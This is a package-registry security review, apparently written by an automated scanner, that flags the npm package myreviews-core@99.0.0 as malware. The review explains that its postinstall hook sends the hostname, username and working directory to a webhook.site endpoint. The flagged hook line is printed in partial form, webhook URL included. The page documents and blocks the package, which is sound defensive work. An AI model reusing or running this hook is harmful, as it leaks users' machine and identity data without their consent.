registry  /  myreviews-core  /  99.0.0

myreviews-core@99.0.0

AI Security Review

scanned 2h ago · by lpm-firewall-ai

Installing the package automatically transmits local host and user metadata to a third-party webhook. The behavior is unrelated to the empty package entrypoint.

Static reason
High-risk behavior combination matched malicious policy.
Trigger
Automatic npm `postinstall` during package installation.
Impact
Leaks hostname, username, working directory, and installation timing to a remote endpoint.
Mechanism
Install-time HTTPS metadata exfiltration via inline Node command.
Attack narrative
On npm installation, `package.json` executes an inline Node command through `postinstall`. It collects `os.hostname()`, `os.userInfo().username`, `process.cwd()`, and a timestamp, then sends them as query parameters to a `webhook.site` URL. The package's `index.js` exports only an empty object, providing no legitimate functionality that explains this automatic collection and transmission.
Rationale
Direct source inspection confirms an unconsented install-time exfiltration request. The empty entrypoint makes the telemetry behavior clearly malicious rather than package-aligned.
Evidence
package.jsonindex.js
Network endpoints1
webhook.site/ac3b6fd3-80b7-41ee-9d43-f8b815959005

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • `package.json` defines an automatic `postinstall` hook.
  • The hook runs `node -e` and sends an HTTPS request to `webhook.site`.
  • The request includes hostname, local username, current working directory, and timestamp.
  • `index.js` is empty, so the install hook is the package's only meaningful behavior.
Evidence against
  • No additional source files, payload loader, or legitimate runtime functionality were found.
Behavioral surface
SourceNo risky source behavior triggered.
Supply chain
Trivial
ManifestNo manifest risk signals triggered.
scanned 1 file(s), 23 B of source

Source & flagged code

2 flagged · loading source
package.jsonView file
scripts.postinstall = node -e "require('https').get('https://webhook.site/ac3b6fd3-80b7-41ee-9d43-f8b815959005?pkg=myreviews-core&host='+require('os').hostname()+'&user='+require('os').userInfo().userna...
Critical
Red Install Lifecycle Script

Install-time lifecycle script matches a deterministic static-gate block pattern.

package.jsonView on unpkg
scripts.postinstall = node -e "require('https').get('https://webhook.site/ac3b6fd3-80b7-41ee-9d43-f8b815959005?pkg=myreviews-core&host='+require('os').hostname()+'&user='+require('os').userInfo().userna...
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg

Findings

1 Critical1 High1 Low
CriticalRed Install Lifecycle Scriptpackage.json
HighInstall Time Lifecycle Scriptspackage.json
LowScripts Present